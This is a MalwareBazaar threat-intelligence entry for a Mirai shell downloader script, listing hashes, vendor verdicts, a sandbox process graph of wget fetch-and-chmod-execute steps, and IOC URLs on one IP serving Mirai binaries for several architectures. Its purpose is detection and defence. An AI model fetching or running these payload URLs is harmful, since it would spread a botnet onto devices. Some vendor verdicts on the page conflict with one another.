MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99
SHA3-384 hash: a3967e91bf0f32cbae7aec51079302864323bbe66f52cae2bf1c58de22804256484d68c3302f98a957f28e4d43248d8f
SHA1 hash: cead00ccf627a2e37cdec395218444be3006dff9
MD5 hash: 514ce6a0b09eb9dd0703408c3d7273a9
humanhash: mars-lamp-april-tango
File name:toto.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:444 bytes
First seen:2025-09-18 16:59:37 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 6:SFkYqtmRkYqiMkYq6NIl5GkYqSa0LKie3kY6IUkY8WT1kY9anIVn:HVVVi9V6NIl53VH0LKVUUFG6cVn
TLSH T17CF0A08D36126F66880ECE42F6730AA85401EAD112A9CF8BF5D60CB65C9C580B0B6F45
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://103.153.69.151/arm41b8c6487a37f507e54241cc60111ef4c03955448b44d18d4d0c776617419ad7a Miraielf mirai ua-wget
http://103.153.69.151/arm5f780dc09d326a38c0d712fea1243112d6148f81d323529bd726ffca0e8382805 Miraielf geofenced mirai ua-wget USA
http://103.153.69.151/arm6dd7ef996397753a979ec93c81eb09ebb653a52311fad9d277a2c6bada7045b18 Miraielf geofenced mirai ua-wget USA
http://103.153.69.151/arm78499db38a52efc4646eb70e5b1a1e6c4cdea4c4811bd255559303cc002ac3593 Miraielf geofenced mirai ua-wget USA
http://103.153.69.151/mips9bad584a9bcc3747c703d637720558a9f6389c636f7515c8e6cce8d31a91a8a2 Mirai32-bit elf mirai Mozi
http://103.153.69.151/mpsla974b7de7fff143231cceb4336d022192096f814e7512a7d246fef7235ccb606 Miraielf geofenced mips mirai ua-wget USA
http://103.153.69.151/x8656fb720aa04bb923a80712cd690510c2c532e5cc3fe0e32868eb4097cc3132bf Mirai32-bit elf mirai Mozi

Intelligence

File Origin
# of uploads :
1
# of downloads :
42
Origin country :
DE DE
Vendor Threat Intelligence
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/68cc3b21390649f7a5f2f181/reports/75165ea7-03fd-467a-8dd2-7dc6a1159a9f/overview
Verdict:
Malicious
File Type:
text
First seen:
2025-09-18T15:18:00Z UTC
Last seen:
2025-09-18T15:18:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.a
Link:
https://opentip.kaspersky.com/8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/b783a5e4-9a1a-4fac-8232-3a90ad06ef40
Behavior Graph:
Download SVG
%3 guuid=87c08b9e-1a00-0000-6577-e68d810c0000 pid=3201 /usr/bin/sudo guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208 /tmp/sample.bin guuid=87c08b9e-1a00-0000-6577-e68d810c0000 pid=3201->guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208 execve guuid=c7fb55a1-1a00-0000-6577-e68d8a0c0000 pid=3210 /usr/bin/wget net send-data guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=c7fb55a1-1a00-0000-6577-e68d8a0c0000 pid=3210 execve guuid=dc94f0fc-1a00-0000-6577-e68dff0c0000 pid=3327 /usr/bin/chmod guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=dc94f0fc-1a00-0000-6577-e68dff0c0000 pid=3327 execve guuid=e9f939fd-1a00-0000-6577-e68d000d0000 pid=3328 /usr/bin/dash guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=e9f939fd-1a00-0000-6577-e68d000d0000 pid=3328 clone guuid=98d650fd-1a00-0000-6577-e68d010d0000 pid=3329 /usr/bin/wget net send-data write-file guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=98d650fd-1a00-0000-6577-e68d010d0000 pid=3329 execve guuid=ef0f0246-1b00-0000-6577-e68d9b0d0000 pid=3483 /usr/bin/chmod guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=ef0f0246-1b00-0000-6577-e68d9b0d0000 pid=3483 execve guuid=f0f79646-1b00-0000-6577-e68d9d0d0000 pid=3485 /usr/bin/dash guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=f0f79646-1b00-0000-6577-e68d9d0d0000 pid=3485 clone guuid=8560e948-1b00-0000-6577-e68da30d0000 pid=3491 /usr/bin/wget net send-data write-file guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=8560e948-1b00-0000-6577-e68da30d0000 pid=3491 execve guuid=92a1158a-1b00-0000-6577-e68dc50d0000 pid=3525 /usr/bin/chmod guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=92a1158a-1b00-0000-6577-e68dc50d0000 pid=3525 execve guuid=2735838a-1b00-0000-6577-e68dc60d0000 pid=3526 /usr/bin/dash guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=2735838a-1b00-0000-6577-e68dc60d0000 pid=3526 clone guuid=fb9f478c-1b00-0000-6577-e68dca0d0000 pid=3530 /usr/bin/wget net send-data write-file guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=fb9f478c-1b00-0000-6577-e68dca0d0000 pid=3530 execve guuid=46aa11cf-1b00-0000-6577-e68d5f0e0000 pid=3679 /usr/bin/chmod guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=46aa11cf-1b00-0000-6577-e68d5f0e0000 pid=3679 execve guuid=e5eccecf-1b00-0000-6577-e68d600e0000 pid=3680 /usr/bin/dash guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=e5eccecf-1b00-0000-6577-e68d600e0000 pid=3680 clone guuid=493e43d1-1b00-0000-6577-e68d620e0000 pid=3682 /usr/bin/wget net send-data write-file guuid=286419a1-1a00-0000-6577-e68d880c0000 pid=3208->guuid=493e43d1-1b00-0000-6577-e68d620e0000 pid=3682 execve 4a11bae5-96b9-5d35-a72a-4e49f7748dce 103.153.69.151:80 guuid=c7fb55a1-1a00-0000-6577-e68d8a0c0000 pid=3210->4a11bae5-96b9-5d35-a72a-4e49f7748dce send: 133B guuid=98d650fd-1a00-0000-6577-e68d010d0000 pid=3329->4a11bae5-96b9-5d35-a72a-4e49f7748dce send: 133B guuid=8560e948-1b00-0000-6577-e68da30d0000 pid=3491->4a11bae5-96b9-5d35-a72a-4e49f7748dce send: 133B guuid=fb9f478c-1b00-0000-6577-e68dca0d0000 pid=3530->4a11bae5-96b9-5d35-a72a-4e49f7748dce send: 133B guuid=493e43d1-1b00-0000-6577-e68d620e0000 pid=3682->4a11bae5-96b9-5d35-a72a-4e49f7748dce send: 133B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99
Threat name:
Linux.Worm.Mirai
Create hunting rule
Status:
Malicious
First seen:
2025-09-18 17:02:14 UTC
File Type:
Text (Shell)
AV detection:
12 of 24 (50.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=rtoay3uvr55nmgihg4jdpxe2hrccwsf73l6y4nroo64ncublbomq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250918-vjydpabr5w/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 8cdc0c6e958f7ad61907371237dc9a3c442b48bfdafd8e362e77b8d1502b0b99

(this sample)

Mirai

elf 1b8c6487a37f507e54241cc60111ef4c03955448b44d18d4d0c776617419ad7a

  
URLhaus
https://urlhaus.abuse.ch/url/3626374/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3626377/
  
Dropping
MD5 3856b67d5064e53a48be43ecbdb6eabe
  
Dropping
SHA256 1b8c6487a37f507e54241cc60111ef4c03955448b44d18d4d0c776617419ad7a

Comments